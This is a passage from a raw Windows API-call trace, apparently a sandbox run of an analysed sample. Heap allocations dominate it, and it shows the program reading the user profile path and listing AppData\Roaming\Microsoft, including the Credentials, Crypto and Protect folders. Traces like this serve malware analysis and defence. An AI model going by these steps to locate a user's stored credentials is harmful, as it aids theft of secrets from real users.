lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0201.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0201.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0201.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0201.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0201.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0201.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0201.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0201.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0201.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0201.216] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0201.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0201.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0201.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0201.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0201.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0201.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0201.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0201.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0201.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0201.217] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0201.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0201.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0201.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0201.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0201.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0201.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0201.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0201.217] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0201.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0201.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0201.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0201.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0201.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0201.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0201.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0201.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0201.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0201.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0201.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0201.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0201.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0201.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0201.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0201.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0201.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0201.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0201.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0201.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0201.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c8d0 [0201.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Microsoft", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft", lpFilePart=0x8bedfc*="Microsoft") returned 0x37 [0201.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0201.219] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft")) returned 0x2014 [0201.219] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa59a0 [0201.219] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0201.219] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c36290, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x7c36290, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x7c36290, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="AddIns", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Crypto", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f766d30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c1e0470, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xd01394e0, ftLastAccessTime.dwHighDateTime=0x1d301bc, ftLastWriteTime.dwLowDateTime=0xd01394e0, ftLastWriteTime.dwHighDateTime=0x1d301bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Excel", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="IME12", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x54b77470, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b77470, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f5d6350, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x2f5d6350, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x2f5d6350, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="MMC", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="MS Project", cAlternateFileName="MSPROJ~1")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Network", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43c8ae30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dae0390, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5dae0390, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Office", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5c734300, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6215c440, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6215c440, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Outlook", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33c0ebb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x33c0ebb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x33c0ebb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="PowerPoint", cAlternateFileName="POWERP~1")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x510b16f0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x510b16f0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x510b16f0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Proof", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x541f1c70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x541f1c70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Protect", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43bcc750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x43bcc750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x43bcc750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbec39d0, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0xbec39d0, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Publisher Building Blocks", cAlternateFileName="PUBLIS~2")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Speech", cAlternateFileName="")) returned 1 [0201.220] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0201.221] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31d42f10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x2795d470, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x2795d470, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0201.221] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbab2410, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbab2410, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="UProof", cAlternateFileName="")) returned 1 [0201.221] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Windows", cAlternateFileName="")) returned 1 [0201.221] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Word", cAlternateFileName="")) returned 1 [0201.221] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xcff, dwReserved1=0x4, cFileName="Word", cAlternateFileName="")) returned 0 [0201.221] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0201.221] GetLastError () returned 0x12 [0201.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0201.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0201.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | 